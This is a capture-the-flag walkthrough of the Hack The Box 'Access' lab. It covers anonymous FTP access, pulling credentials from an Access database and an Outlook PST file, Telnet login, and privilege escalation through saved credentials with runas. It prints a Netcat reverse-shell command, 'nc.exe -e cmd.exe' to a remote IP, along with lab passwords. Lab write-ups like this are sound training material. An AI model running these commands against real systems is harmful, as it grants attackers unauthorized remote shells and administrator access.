Reconnaissance#
- On the initial Nmap scan I can see interesting ports open which are FTP, Telnet and a http port(80)

- Quickly I checked for anonymous login and it seems like it was enabled. Which was interesting.
- While at that I also discovered that home page mentions
LON-MC6which leads toMS09-042a vulnerability in Telnet
Definition This security update resolves a publicly disclosed vulnerability in the Microsoft Telnet service. The vulnerability could allow an attacker to obtain credentials and then use them to log back into affected systems. The attacker would then acquire user rights on a system identical to the user rights of the logged-on user. This scenario could ultimately result in remote code execution on affected systems. An attacker who successfully exploited this vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
- Anyway when I try to login FTP, and it worked but after that I can’t access any directories it’s simply giving timeouts. Which was frustrating

- After multiple tries atlast I was able to access the files in FTP.
Enumeration#
Analyzing backup.mdb#
- While enumerating the directories I found two files interesting one was an db file -
backup.mdb
> file backup.mdb
backup.mdb: Microsoft Access Database
- To see the contents of the database I installed a tool
sudo apt install mdbtools - I can list all the tables using this coomand
mdb-tables backup.mdb
- To get the data from a table I could use this command
mdb-export backup.mdb <table-name>
- From
auth_usertable I got a username and password
> mdb-export backup.mdb auth_user
<SNIP>
27,"engineer","access4u@security",1,"02/24/18 1:54:36",26,
<SNIP>

Exploitation#
Analyzing Access Control.zip#
- The other file was a compressed zip file -
Access Control.zip. - I used this password
access4u@securityfor the zip file and extracted it’s contents
7z x Access Control.zip
- It had only one file called
Access Control.pst. I can see that this is a outlook mail file. - So I used a online
PSTopener and read it’s contents - To keep it simple, It had password for another account. The message reads…
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
- This username
securityand the password4Cc3ssC0ntr0llerworks for telnet. So I logged in as usersecurity - Then I got theUser flag

Privilege Escalation#
- Using
cmdkey /listwill show the available and stored creds. - We can use
runasfor running as something if appropriate constraints are valid. For an examplerunasis similar tosudofor windows if not the same. - Here in this case we got saved creds so first lets transfer
nc.exeto the target machine - Then I used this command to save it to a bat file
echo c:\users\security\nc.exe -e cmd.exe 10.10.14.12 6001 > shell.bat
- And execute it with
runascommand with saved creds for the useradministrator
runas /user:administrator /savecred c:\users\security\shell.bat
- This above command will use the saved password for the user
Administratorand run the maliciousbatfile asAdministrator - I got access as administrator in my shell
- I gotRoot access

Summary#
The Access machine from Hack The Box was an easy Windows-based challenge involving FTP access, database extraction, and privilege escalation. Initial enumeration revealed open FTP, Telnet, and HTTP ports, with anonymous FTP login enabled. A Microsoft Access database (backup.mdb) contained credentials, which unlocked a protected ZIP file leading to an Outlook PST file with another set of credentials. Using Telnet, I logged in as security and retrieved the user flag. Privilege escalation was achieved by leveraging stored credentials with cmdkey and runas, executing a Netcat reverse shell to gain administrator access and retrieve the root flag. The box was straightforward but engaging, with a mix of credential discovery and privilege escalation.



